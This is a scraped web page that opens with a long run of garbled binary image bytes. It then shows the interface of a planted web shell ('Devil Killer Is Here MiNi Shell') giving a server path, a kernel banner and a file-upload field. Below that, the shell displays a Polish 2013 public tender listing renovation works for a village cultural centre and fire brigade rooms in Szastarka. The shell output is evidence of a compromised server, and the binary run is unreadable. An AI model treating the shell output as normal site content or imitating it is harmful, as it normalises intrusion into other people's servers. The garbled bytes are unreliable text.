JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130522/85719-N-2013.html

<p class="kh_header"><b>Szastarka: Remont i wykończenie świetlicy Wiejskiego Domu Kultury w Szastarce Stacji</b><br>
<b>Numer ogłoszenia: 85719 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szastarka , 23-225 Szastarka, woj. lubelskie, tel. 015 8714104, faks 015 8714130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i wykończenie świetlicy Wiejskiego Domu Kultury w Szastarce Stacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ  DOTYCZĄCA WYKONANIA ROBÓT  PRZEZNACZONYCH DLA  WIEJSKIEGO DOMU KULTURY  W SZASTARCE STACJI

A.  ROBOTY BUDOWLANE -  ZAKOŃCZENIE STANU SUROWEGO

1. roboty rozbiórkowe-konstrukcji betonowych 1 m3,rur i rynien spustowych 74,94m,pokrycia dachowego 598,41m2, elementów więźb dachowych 598,41 m22.ściany-kominy 2,8m3,izolacje z papy asfalt. 0,49m2, 3.podłogi i posadzki-25,71m3, 4.ławy fundamentowe - 11,7 m3, 5.ściany z bloczków z bet.kom. z cegieł  - 72,51m2
6.słupy,podciągi, wieńce, strop -13m37.ławy fundamentowe żelbetowe16,06 m3,stopy 0,68m3,słupy0,8m3,izolacje pionowe z w-wy papy -232,4 m2, 8.ściany z bloczków z bet.kom.i cegieł budowl.218,4 m3 9.słupy 0,84 m3,belki i podciągi 9,3m3, strop gęsto żebrowy 113,034 m3,schody żelb.zabieg.13.4m2 10.podłogi i posadzki -podkłady z ubitych mat.sypkich 11,95m3 11.konstrukcja dachu  z tarcicy nasyconej (krokwie-1084m)nadbitki1,5 m3, pokrycie blachą trapezową powlekaną, kolor nawiązać do istniejącego-706,34 m212.obróbki blacharskie  43,33 m213.stolarka okienna z tworzyw sztucznych (wym:600mmx1500mm 0,76 m2,900x900mm i 850 x 850 mm-5,36 m2,1500mm x 900mm 6,8m2,600mmx1800mm 1,8m2,900mmx1500mm 1,1m2,1200mmx1800mm 31,2m2,1500mmx1500mm 1,9m2,1200mmx1500mm 1,5m2,),drzwi balkonowe  z tworzyw sztucznych 7,1 m2,bramy garażowe(rolowane) uchylne-29,4m2,

B. ROBOTY BUDOWLANE -  WYKOŃCZENIE 
1.roboty rozbiórkowe i przygotowawcze-wykucie z muru ościeżnic drewnianych 4 szt.ościeżnic drewnianych-16,1m2,ościeżnic stalowych lub krat drzwiowych - 3 szt.podokienników betonowyc-13,7m,uzup[lenienie ścian lub zamurowanie otworów w ścianach-4,7m3, zerwanie posadzki z tworzyw sztucznych-165,3 m2,rozebranie podłóg na wpust-111,3m2,legarów-113,2m,odbicie tynków wqewn.-448,9 m2,przecieranie istn,tynków wewn. z zeskrobaniem farby-332,8m22.ściany działowe z płytek z bet.kom- gr.12 cm-124,5m2, gr.6 cm-13,3 m2,ściany z płyt gipsowo-karton.(bez wartości płyt z wełny mineral.do izolowania ścian dział. -100 mm)-63,0m2,3.tynki -odbicie  odstających i uzupełnienie tynków zwykłych  wewn. na ścianach,słupach prostokątnych 67m2,tynki zwykłe wewn.II kat. ścian,słupów- 359,2m2,kat.III-769,0m2,kat.III stropów i podciągów-295,9m2, tynki zwykłe  na ościeżach-9,7 m2,gładzie gipsowe jednowarstwowe na ścianach i sufitach 1397,84 m2, ocieplenie ścian budynku płytami styropianowymi  frez.gr.14 cm-45,5m2,dyble-182 szt. Izolacje cieplnei p.dźwiękowe z wełny min- pomiędzy krokwiami-1 w-wa gr.18 cm-496,1m2,  okładziny gips-karton. Z wysokiej odporności ogniowej pojedyncze na stropach rozstaw profili 60 cm- płyta-12,5mm-496,14 m2,
licowanie ścian płytami z kamieni sztucznych 20x25 lub 30 x 30 cm  na zaprawie klejowej-369,2 m2,4.stolarka  wewnętrzna-okna z tworzyw sztuczn.0,61 m2,podokienniki i półki o szer.do 30 cm-35,6 m, mocowanie ościeżnic  drewnianych-80x200 cm-1,36 m2, ościeżnic drewnianych-90x200 cm-33,7m2, ościeżnic drewnianych 140x200 cm-4,7m2,montaż skrzydeł drzwiowych wwn.oszklonych fabrycznie wykończonych-4.7m2,wewn.pełnych -szyldy i klamki-19,9 m2,wewn.pelnych otwieranych naścianę-szyldy,klamki 1,5m2,wewn.oszklonych -drzwi łazienkowe,z szybą oraz otworem wentylacyjnym,szyldy,klamki-12,2 m2, drzwi jednoskrzydłowe p.pożarowe EI 30 z dodatk.zamkiem wpuszczonym samozamykaczem w wersji dymoszczelnej-13,7 m2,
5.posadzki- betonowe -13,8m3, izol.p.wilgociowe z papy termozgrzewalnej-2 w-wy-514,7 m2,izol.p.wilgoc. z papy termozgrzewal-1 w-wa - 87,3 m2,  izolacje poziome z płyt styropianowych EPS 100-gr.10 cm-427,4 m2, izol.z folii polietylenowej-115,5 m2,w-wy wyrówn. pod posadzki z zapr.cement- gr.40 mm-427,4m2,gr.50 mm-202,8m2,zbroj.siatką stalową-630,2m2,posadzki płytkowe z kamieni sztuczn-antypoślizgowe 30 x30 cm-166,6 m2,cokoliki płytkowe z kamieni sztucznych-56,9 m, okładziny schodów płytkami 30x30 cm-18,1 m2,posadzki z desek posadzkowych-257,1 m2,posadzki z paneli podłogowych-104,8 m2, izolacje poziome z wełny -1 w-wa- 445,9m2, izolacje z folii paro przepuszczalnej -445,9 m2, scena drewniana -9,8m2,6.elementy kowalsko - ślusarskie i inne elementy-balustardy z prętów-5,3m,pochwyt dla osoby niepełnosprawnej-szt-37.roboty malarskie-emulsją dwukrotniepodłozy gips.-wraz z grunt-1523,5 m2,dwukrotne malowanie zwykłą farba olejną  lub ftalową tynków wewn. 433,4 m2, lakierowanie ceny-3-krotne-9,8m2.8.elewacja - docieplenie  ścian z cegły płytami styropianowymi  frez.EPS 70-040 gr.10 cm,tynk minerl. cienkowarstwowy,kolor I grupa-56,1 m2,docieplenie ścian  płytami styrop. Ochrona narożników-209,4 m, licowanie ścian płytami klinkierowymi 25x6 cm -24,0 m2, obróbki blacharskie z blachy płaskiej  powlekanej/poliester polysk-15,3m2m,elewacja z paneli -161,4 m2, siding -elementy wykończ.- 161,4 m2, obsadzenie kratek wentylacyjnych w otworach kominów- 14 x 14 b/żaluzji 40 szt.

C. ROBOTY  BRANŻY SANITARNEJ

1.przyłacze kanalizacyjne- z PCV 34 m,studzienki kanalizacyjne- średni.315-425 mm-2 szt.
2.przyłącze wodociągowe- PE,PEHD o śr.zewn. 63 mm-16,1m,(wodomierze,zawory,rury ochronne)3.instalacja wodociągowa, na ścianach budynku- śr. zewn.25 mm,32mm,40 mm,50 mm,63 mm,-266,33 m,(otuliny,izolacje,zawory przelotowe,zwrotne)4.instalacja kanalizacyjna-rozbiórki konstrukcji betonowej,niezbrojonej, wywiezienie gruzu -6,8m3, montaż umywalek pojedynczych - 5 szt,zlewozmywaków żeliwn.-11 szt.i porcelanowych-1 szt.5.instalacja gazowa na gaz płynny PROPAN-  bateria butli gazu 3 x 33 kg,
6.instalacja c.o.miedziana o śr.zewn,15 mm,18 mm, 22 mm,28 mm,35 mm - 551,42 m, grzejniki stalowe  dwupłytowe o wysok.600x900mm i dłg,1600mm-szt.2,trzypłytowe 600x900 dłg.1600 mm-2 szt.dwupłytowe 600x900 dłg.1600 mm-18 szt.dwuplytowe 300 x 500mm dłg.1600mm-2 szt,trzypłytowe 600x900 mm dłg.1600 mm18 szt.(zawory,izolacje,)
7.kotłownia - kocioł o mocy 105 kWE z regulatorem,czujnikami,okablowaniem,z palnikiem olejowym lub równoważnym, wymiennik pojemnościowy c,w,u. 500 l, naczynie wzbiorcze pionowe - 2 szt. (oraz armatura towarzysząca szczegółowo opisana w przedmiarach robót)

D.ROBOTY BRANŻY ELEKTRYCZNEJ - WEWNĘTRZNEJ1.tablica rozdzielcza T1-wykucie wnęk w ścianach-0,17 m2,montaż skrzynki wraz z wyposażeniem,
2.tablica rozdzielcza T2- wykucie wnęk w ścianach-0,17 m2,montaż skrzynki wraz z wyposażeniem,3.tablica rozdzielcza T3- wykucie wnęk w ścianach-0,17 m2,montaż skrzynki wraz z wyposażeniem,4.tablica rozdzielcza TK-montaż skrzynki z wyposażeniem,5.W.L.Z.-wewnętrzna linia zasilająca- szczegółowy opis w przedmiarze robót,6.Montaż oświetlenia wewnętrznego- szczegółowy opis w przedmiarze robót,7.montaż  osprzętowienia i gniazd wtykowych- szczegółowy opis w przedmiarze robót,8.instalacja siły- kable 4-ro żyłowe,szczegółowy opis w przedmiarze robót,9.instalacja wyrównawcza- szczegółowy opis w przedmiarze robót,10.instalacja odgromowa- 171 m,bednarka FeZn 25 x 4,11.pomiary instalacji odgromowej,zasilania wyłącznika róznicowoprądowego,1-fazowego obw.elektr. niskiego napięcia

E.ROBOTY BRANŻY ELEKTRYCZNEJ -  ZEWNĘTRZNEJ 

1.przebudowa linii  energetycznej nN( demontaż słupów  żelbetowych, linii nN -0,323 km, pojedynczych i  rozkracznych - szt.2 ) budowa przyłącza kablowego  do budynku-montaż i stawianie słupów wirowanych, jednożerdziowych z ustojem prefabrykowanym linii napowietrznej nN  o dłg.żerdzi 12 m-szt.2 układanie kabli energet. na słupach betonowych -3,4 m, układanie kabli energet.  w rowach kablowych o gł. do0,8m-15,3 m,wraz z wyposażeniem

F. ROBOTY BRANŻY SANITARNEJ 

1.wykonanie zbiornika  żelbetowego na ścieki-ściany żelbetowe proste gr.8 cm,wys.do 3m- 19,403m2, żelbetowe płyty stropowe gr.15 cm płaskie-7,2 m2, obrzeże betonowe o wym,20x6 cm -8,55 m, nawierzchnia z kostki brukowej betnowej gr.6 cm na podsypce  cement-piaskowej- 6,41 m2.

CZĘŚĆ  DOTYCZĄCA WYKONANIA ROBÓT W POMIESZCZENIACH PRZEZNACZONYCH  DLA   OCHOTNICZEJ STRAŻY POŻARNEJ                                        W SZASTARCE STACJI

G.  ROBOTY BUDOWLANE -  ZAKOŃCZENIE STANU SUROWEGO

1. roboty rozbiórkowe- konstrukcji betonowych, niezbrojonych o gr.do 15 cm.0,176 m3,rynien z blachy nadającej się do użytku 9,99 m, rur spustowych z blachy nadającej się do użytku 3,12 m, pokrycia dachowego z blachy nie nadającej się do uzytku 67,0m2, elementów więźb dachowych-deskowanie dachu z desek  67,0m2,pokrycia dachowego z blachy nadającej się do użytku37,7 m2, elem.więźb dachowych ze stolcami 104,7 m2, podstemplowania zagrożonych stropów bez deskowania 4,44m2,2.ściany- wieloprzewodowe kominy wolno stojące z cegieł ? x 1/2ceg.0,25 m3,kominy z cegły klinkierowej 1/2x 1/2ceg.klinkier.drążonej wraz z czopkami 0,25 m3,izolacje z papy asfaltowej na sucho 2 w-wy 0,08m23.podłogi i posadzki podkłady z ubitych mat.sypkich na podł.gruntowym 4,5m3,podkłady murarskie z tłucznia lub żużla -gruzobeton gr.10 cm 4,5m3.4.ławy fundamentowe - roboty ziemne 2,05m3,podkłady z ubitych mat.sypkich0,11 m3,2-w-we izol. poziome z papy termozgrzewalnej na sucho na chudym betonie 1,17 m2,ławy fundamentowe prostokątne żelbet. szer.0,6m 0,46 m3,fundamenty z bloczków betonowych 1,01 m3, izol.pionowe murów z 1 w-wy papy na lepiku z wypr.z zaprawy cement. 9,8m2, izol,pionowe murów 9,8 m2,izol.z papy asfalt. na sucho 2 w-wy 0,6m2.5.ściany budynków jednokondygnacyjnych o wys.do 4,5 m z bloczków z bet,kom. gr.24 cm.12,55 m2, ściany bud.  z cegieł budowl. gr. 1 cegły 0,16 m2, otwory w ścianach murowanych-nadproża prefabrykowane L19 dł. 1,19m- 6,9 m, L19- dł.1,49 m- 7,99m, L 19 dł.1,79m- 2,78 m, wieloprzewodow. kominy wolnostojące z cegieł ? x1/2  cegł.klinkierowej 0,8m3, otwory w ścianach dla okien i drzwi 4,16m3, 6.słupy - zbrojenie z prętów gładk, fi 6 mm 0,032 t,z prętów żebrow.fi 12-14 mm-  0,108 t, z prętów żebrow. fi 16-28 mm 0,027 t,słupy żelbet,o wys.do 4m-0,074 m3, belki i podciągi-2,1m3,7.ławy fundamentowe - 2,9m3,fundamenty z bloczków bet.5,3m3,słupy żelbet. prostokątne  0,054m3,izol.pionow. murów  z  1 w-wej papy termozgrzewal.40,69m2, obniżenie zwierciadła wody gruntowej na czas wyk.fundament.25,56m2, 8.ściany - z bloczków z bet.komórkowego gr.37 cm-14,21 m2,z cegieł gr.1 ? -1.04 m2,z bloczków  z bet. komórk. gr.24 cm-22,15 m2,gr.z 1cegły-0,84m2,wieloprzewod.kominy wolnostojące gr.1 cegły -0,87 m2,z cegły ? x1/2 klink.drązonej-z czapkami-0,11m3, izol.z papy asfaltowej 6,01 m2,nadproża L 19 dł.1.19 m- 5,4 m, L 19 dł.1,49-1,02m, L 19 dł.1,79 m- 1,6 m.9.słupy zbrojenie pręty gładkie- fi 6mm-0,03t,fi 8-12 mm-0,009 t,pręty żebr fi 12-14 mm-0,15t, żebr.fi 16-28 mm-0,019t, betonowanie słupów-0,14m3,belki i podciągi żelbet. Z zastosow.pompy do bet-1,6 m3, stropy gęsto żebrowe TERIVA 4,0/1-19,79m2, schody  żelbetowe na płycie/belkach policzkowych gr.plyty 8 cm-2,3 m2,  rzutu,żelbet.płyty stropowe gr.15 cm- 1.8 m2 z zastosow. pompy do betonu, 10.podłogi i posadzki-podkłady z ubitych materiałów sypkich na podłożu gruntowym-2,09m3, podkłady murarskie z tłucznia lub żuzla -gruzobeton gr.10 cm-2,09 m3,11.konstrukcja dachu wraz z pokryciem  - murłaty 15 x 15 cm-0,32 m3 drew.konstrukcja drewniana z tarcicy nasyconej krokwie,płatwie,słupy,miecze,łaty,wiatroizolacja z foli dachowe-123,67 m2, okna dachowe 0,83 kpl.pokrycie blachą trapezową gr.0,88 mm na łatach -kolor w nawiązaniu do istniejącego-123,67m2, obróbki blacharskie z blachy powlek.14 m2, montaż wyłazu dachowego 80x90 cm 0,42 m2,  rynny16,2m, rury spust.4.5m,12.stolarka okienna z tworzyw sztucznych 600x 1500 mm-0,13 m2,900x900mm,850x850mm-0,93m2,1500x 900mm-1,2 m2, 600 x 1800mm-0,32 m2,900 x 1500mm-0,21m2, 1200 x 1800 mm-5,4 m2, 1500 x 1500 mm-0,33 m2, 1200 x 1500- 0,26 m2, drzwi balkonowe z tworzyw sztucznych- 1,2 m2,  bramy garażowe uchylne-5,1 m2,  

H. ROBOTY BUDOWLANE -  WYKOŃCZENIE 

1.roboty rozbiórkowe i przygotowawcze-wykucie z muru ościeżnic drewnianych-szt1,
o pow.ponad 2m2-2,8m2, ościeżnic  stalowych lub krat drzwiowych -0,596 szt,podokienników betonowych- 2,4 m, uzupełnienie ścian/zamurowanie  otworów w ścianach bloczkami z bet.komórk-0,8m3, zerwanie posadzki z tworzyw sztucznych-28,94 m2, rozebranie podłóg białych na wpust-19,49 m2,legarów19,82m,rozebr.elemnt.konstr.betonowych niezbrojonych do gr.15 cm-3,58m3,przecieranie istn.tynków wewn. z zeskrob,farby na stropach,spocznikach,biegach-22,48m2, analog. tylko na ścianach-35,79 m2, odbicie tynków wewn. z zaprawy cement. na  ścianach, filarach, pilastrach -78,60 m2,2.ściany działowe-z płytek z bet.komórkowego gr.12 cm-21,8m2,  gr. 6 cm-2,33,m2, ściany dział.z płyt kartonowo-gipsowych/bez w-wy z płyt z wełny mineralnej/płyta ognioochronna 12,5mm-11,03 m2, plus płyty z wełny mineralnej -100mm-6,7m2.3.tynki- odbicie odstających i uzupełnienie tynków zwykłych wewn.kat.III z zapr.cement-wapienn. na ścianach i słupach prostokątnych  na podłożu z cegły i pustaków -7,16m2, obicie i uzupełnienie jw. tylko na stropach,belkach,podciągach,biegach,
spocznikach,siatek-4,49 m2, tynki zwykłe wewn.II kat. Ścian i słupów -62,89 m2,tynki zwykłe wewn.III kat,ścian i słupów-134,64 m2,tynki zwykłe wewn.kat.III stropów i podciągów-51,81 m2,kratki wentylacyjne 14x27 cm-2,086 szt,14x14 cm-1,49 szt. tynki wewn.kat.III ręcznie wyk.-1,69m2,okładziny  gipsowe jednowarstwowe na ścianach i sufitach-244,74 m2,Przygotowanie starego podłoża pod ocieplenie metodą mokrą -7,9m2,ocieplenie ścian płytami styropianowymi/przyklejone-frezowane gr.14 cm EPS 70-040- 7,9m2,dyble-32 szt, przyklejanie siatki -7,9m2,izol.cieplne i p.dźwiękowe z wełny mineralnej układane na sucho pomiędzy krokwiami-1 w-wa gr.18 cm-86,86m2,izol,cieplne i p.dźwiekowe z wełny min. gr.3,5 cm-86,86 m2, folia poliet.izolacyjna gr,0,3mm-86,86m2, okładziny gipsowo-kartonowe o wysokiej odporności ogniowej, pojedynczo, na stropach  płyta gipsowo-kartonowa ognioochronna 12,5 mm-86,86m2, licowanie ścian płytami z kamieni sztucznych 20x25 lub 30 x 30 cm-62,89 m2,4.stolarka  wewnętrzna- okna z tworzyw sztucznych -0,108 m2,podokienniki i półki z płyt konglomeratów kamiennych -6,2m, montaż ościeżnic ze skrzydłami drzwiowymi/pełnymi,oszklonymi,łazienkowymi,pełnymi, z klamkami,szyldami/ drewnianych80x200 cm-0,23m2,90x200 cm-5,9 m2,140x200cm-0,83 m2,dzrwi stalowe 1-skrzydłowe p.pożarowe EI-30 - z samozamykaczem w wersji dymoszczelnej-2,4m2,5.posadzki  i podkłdy -podłogia betonowe beton zwykły B-10-2,4m3, izolacje p.wilgociowe z papy termozgrzewalnej 2-w-wy 90,13 m2, izolacje p.wilgociowe z papy termozgrzewalnej 1 w-wa -15,2m2,izol.poziome z płyt styropianowych  EPS100-038 gr.5 cm-1,2 m2, w-wy wyrównawcze pod posadzki z zapr.cementowej gr.50 mm-35,51 m2,zbrojenie siatką stalowa-110,35 m2,posadzki płytkowe z kamieni sztucznych antypoślizgowe 30 x 30 cm-3,18 m2, posadzki z desek posadzkowych-45,01 m2,posadzki z paneli podłogowych-18,35 m2,izolacje poziome z wełny mineralnej-78,08 m2, izolacje z folii paro przepuszczalnej-78,08 m2,wykonanie sceny drewnianej z bali 14 x 14 cm- 1,72 m2,
6.elementy kowalsko - ślusarskie i inne elementy-balustrady schodowe z prętów stalowych 0,93 m, pochwyty dla osób niepełnosprawnych-0,596 szt.7.roboty malarskie- 2-krotne  malowanie farbą podłoży gipsowych wraz z gruntowaniem-266,75 m2, 2-krotne malowanie zwykłe farba  olejną lub ftalowa tynków wewn. Bez szpachlowania -75,89m2, lakierowanie sceny drewnianej 3-krotne-1,7m2.  8.elewacja - docieplenie i roboty wykończeniowe zewnętrzne - docieplenie ścian z cegły płytami styropianowymi EPS 70-040 gr.10 cm, metodą lekką-mokra-58,65 m2, analogicznie lecz o gr,2 cm-9,83 m2, docieplenie narożników wypukłych -36,6 m,( kolor grupa I)licowanie płytkami klinkierowymi 25x6 cm ścian-4,2 m2, obróbki blacharskie z blachy płaskiej powlekanejgr-0,70mm-połysk-2,69m2,elementy wykończeniowe typ siding-podsufitka-28,26m2,kratki wentylacyjne 14 x 14 cm/b/żaluzji-szt.7,152

I. ROBOTY  BRANŻY SANITARNEJ

1.przyłacze kanalizacyjne z rur PCV śr.zew.160-0,006 km, 2.przyłącze wodociągowe   z rur (PE,PEHD) o śr.zew.63 mm  - 0,002km,zasuwa typE z obudową o śr.50-65 mm montowane  na rurociągach PCV i PE-kpl.wodomierz skrzydełkowy o śr.nominalnej 32 mm-kpl.zawory kołnierzowe,zwrotne,klapowe o śr.nominalnej50-80mm 1szt. Zawory przelotowe i zwrotne instal. wodociągowych z rur stalowych o śr.nominalnej 40 mm-1 szt.chodnik z płyt betonowych 50x50x7 cm na podsypce piaskowej z wypełnieniem spoin -0,149 m2,rury ochronne PE o śr. Do 110 mm w wykopie-0,149 m,próba szczelności sieci wodociągowych - próba -0,149, oznakowanie trasy- na słupku betonowym - kpl.0,149 m3.instalacja wodociągowa- z rur polipropylenowych o śr. zewn.20mm - 29,204m,o śr.zewn.25 mm-6,109m,o śr.zewn.-32 mm-3,129m, o śr.zewn.40 mm-5,662m,o śr.zewn.50 mm-1,341m,o Sr.zewn63 mm-1,192 m, rurociągi  instal.wodoc.z  rur stal.ocynk o Sr. Nom.32 mm-3,278 m, o Sr.40 mm o poł.gwintow.-1,937m,odpowiednio  izolacje do średnic 54-70 mm otulinami jednowarstwowymi -1,937 m, dla średnic 28-48 mm otulinami-15,347m, dla średnic 12-22 mm warstwą jednowarstwową-35,313m, szafki hydrantowe- wnekowe-szt.0,298, zawory przelotowe o średnicach nominalnych, baterie umywalkowe, zawory czerpalne,próba szczelności, przebicia otworów  w ścianach,wykucie bruzd w ścianach-szczegółowe opisy w załączonych  przedmiarach, 4.instalacja kanalizacyjna-wykucie bruzd w ścianach,montaż umywalek,pojedynczych porcelanowych,montaż czyszczaków- szczegółowe opisy w załaczonych przedmiarach 5.instalacja gazowa na gaz płynny PROPAN-bateria butli gazu płynnego propan 3 x 33 kg,połączenie butli z instalacją,kurek gazowy z końcówką do  węża-szt.0,745, -szczegółowy opis w przedmiarze robót,6.instalacja c.o.-rurociągi w instalacjach c.o. miedziane o śrenicy 15 mm,-55,875m, o śr.18 mm-14,006m.o śr.22 mm-6,258m, o śr.28 mm-14,604m,o śr. 35 mm-5,811m, próby szczelności instal.z rur stalowych i miedzianych-98,936 m,grzejniki stalowe dwupłytowe,trzypłytowe,zawory grzejnikowe,przelotowe - szczegółowy opis w  załaczonych przedmiarach robót,7.kotłownia-kocioł o mocy 105 kW - jeden wspólny kocioł dla ogrzewania pomieszczeń WDK i OSP, szczegółowy zakres robót  w załączonym  przedmiarze robót

J.ROBOTY BRANŻY ELEKTRYCZNEJ - WEWNETRZNEJ

1.tablica rozdzielcza T1-wykucie wnęk w ścianach, tynkowanie wnęk, montaż skrzynki 
i rozdzielnic skrzynkowych  wraz z wyposażeniem,2.tablica rozdzielcza T2- wykucie wnęk w ścianach, tynkowanie wnęk, montaż skrzynki i rozdzielnic skrzynkowych wraz z wyposażeniem,3.tablica rozdzielcza T3- wykucie wnęk w ścianach, tynkowanie wnęk, montaż skrzynki i rozdzielnic skrzynkowych wraz z wyposażeniem,4.tablica rozdzielcza TK- wykucie wnęk w ścianach, tynkowanie wnęk, montaż skrzynki i rozdzielnic skrzynkowych wraz z wyposażeniem,5.W.L.Z. wewnętrzna linia zasilająca- szczegółowy opis w przedmiarze robót,6 i 7.montaż oświetlenia wewnętrznego- montaż  osprzętowienia  i gniazd wtykowych-oprawy świetlówkowe powyżej 120 W- 23 szt, montaż przekaźników -moduł awaryjny z autostartem, 8.instalacja siły-podłączenie silników w obudowie-kable 4-ro żyłowe Cu do 6mm2,-syrena alarmowa(własność inwestora)9.instalacja wyrównawcza-przewody izolowane,10.instalacja odgromowa-montaż uziomów-29,949 m,osłon przewodów uziemiających-szt.1,490,11.pomiary-sprawdzenia samoczynnego wyłączenia zasilania-próby,

K.ROBOTY BRANŻY ELEKTRYCZNEJ -  ZEWNĘTRZNEJ 
